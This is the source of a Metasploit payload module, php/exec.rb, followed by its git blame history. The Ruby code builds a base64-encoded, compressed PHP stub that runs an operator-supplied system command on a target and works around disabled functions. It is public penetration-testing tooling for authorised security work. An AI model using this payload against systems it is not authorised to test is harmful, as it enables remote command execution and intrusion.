modules/payloads/singles/php/exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Php

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'PHP Execute Command ',
      'Description'   => 'Execute a single system command',
      'Author'        => [ 'egypt' ],
      'License'       => BSD_LICENSE,
      'Platform'      => 'php',
      'Arch'          => ARCH_PHP
      ))
    register_options(
      [
        OptString.new('CMD', [ true, "The command string to execute" ]),
      ])
  end

  def php_exec_cmd

    cmd = Rex::Text.encode_base64(datastore['CMD'])
    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
    shell = <<-END_OF_PHP_CODE
    #{php_preamble(disabled_varname: dis)}
    $c = base64_decode("#{cmd}");
    #{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
    END_OF_PHP_CODE

    return Rex::Text.compress(shell)
  end

  #
  # Constructs the payload
  #
  def generate(_opts = {})
    return php_exec_cmd
  end
end
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`##`



use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`module MetasploitModule`
add simple command execution payload for php 2008-09-01 04:41:18 +00:00
Correct the :dynamic cache sizes 2015-03-09 15:44:14 -05:00			`CachedSize = :dynamic`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 15:31:04 -05:00
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`include Msf::Payload::Single`
			`include Msf::Payload::Php`
Retab modules 2013-08-30 16:28:54 -05:00
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'PHP Execute Command ',`
fix author field 2009-04-30 06:12:27 +00:00			`'Description' => 'Execute a single system command',`
			`'Author' => [ 'egypt' ],`
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`'License' => BSD_LICENSE,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP`
			`))`
			`register_options(`
			`[`
Remove harmful default command to execute 2018-11-21 11:09:13 +02:00			`OptString.new('CMD', [ true, "The command string to execute" ]),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`def php_exec_cmd`
Retab modules 2013-08-30 16:28:54 -05:00
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`cmd = Rex::Text.encode_base64(datastore['CMD'])`
			`dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)`
			`shell = <<-END_OF_PHP_CODE`
Move the preamble above all other code 2017-02-02 14:53:53 -06:00			`#{php_preamble(disabled_varname: dis)}`
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`$c = base64_decode("#{cmd}");`
Move the preamble above all other code 2017-02-02 14:53:53 -06:00			`#{php_system_block(cmd_varname: "$c", disabled_varname: dis)}`
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`END_OF_PHP_CODE`
Retab modules 2013-08-30 16:28:54 -05:00
fix author field 2009-04-30 06:12:27 +00:00			`return Rex::Text.compress(shell)`
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`#`
			`# Constructs the payload`
			`#`
Fix crash when generating payload sizes 2022-11-04 00:33:03 +00:00			`def generate(_opts = {})`
add simple command execution payload for php 2008-09-01 04:41:18 +00:00			`return php_exec_cmd`
			`end`
fix author field 2009-04-30 06:12:27 +00:00			`end`